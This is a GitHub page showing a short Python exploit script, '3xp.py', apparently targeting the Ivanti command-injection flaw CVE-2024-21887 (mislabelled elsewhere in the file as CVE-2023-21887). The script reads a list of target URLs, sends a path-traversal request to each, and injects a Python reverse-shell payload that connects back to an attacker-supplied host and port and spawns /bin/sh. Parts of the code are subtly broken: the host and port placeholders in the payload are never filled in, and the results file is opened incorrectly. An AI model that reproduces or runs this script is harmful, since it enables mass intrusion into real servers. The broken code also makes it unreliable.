-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path3xp.py
67 lines (57 loc) · 2.26 KB
/
3xp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import argparse
from urllib.parse import *
import asyncio
import httpx
__author__ = 'zwx'
__CVE__ = "CVE-2024-21887"
payload = '''
;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((f"{host}",{port}));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';
'''
class CVE_2023_21887:
def __init__(self, target_file, output_file, host, port):
self.name = "CVE-2023-21887"
self.target_file = target_file
self.output_file = output_file
self.host = host
self.port = port
async def exploit(self, url, session):
target_path = "/api/v1/totp/user-backup-code/../../license/keys-status/"
target_url = f"{url}{target_path}{quote(payload)}"
print(f"[*] Checking {target_url}")
headers = {
"Content-Type": "application/json",
}
req = await session.get(target_url, headers=headers)
if req.status_code == 200:
print(f"[+] {url} is vulnerable")
print(req.text)
async with open(self.output_file, "a") as file:
await file.write(f"{url}\n")
else:
print(f"[-] {url} is not vulnerable")
async def run(self):
async with httpx.AsyncClient(verify=False) as client:
tasks = [self.exploit(url.strip(), client) for url in self.read_urls()]
await asyncio.gather(*tasks)
def read_urls(self):
with open(self.target_file, "r") as file:
return [line.strip() for line in file]
def parse_args():
parser = argparse.ArgumentParser(description="CVE-2023-21887 Exploit Scanner")
parser.add_argument(
"--host", default="", help="Host for reverse shell payload"
)
parser.add_argument(
"--port", type=int, default=443, help="Port for reverse shell payload"
)
parser.add_argument(
"-o", "--output", default="CVE-2023-21887.txt", help="Output file for results"
)
parser.add_argument(
"target_file", default="list.txt", help="File containing a list of URLs to check"
)
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
cve = CVE_2023_21887(args.target_file, args.output, args.host, args.port)
asyncio.run(cve.run())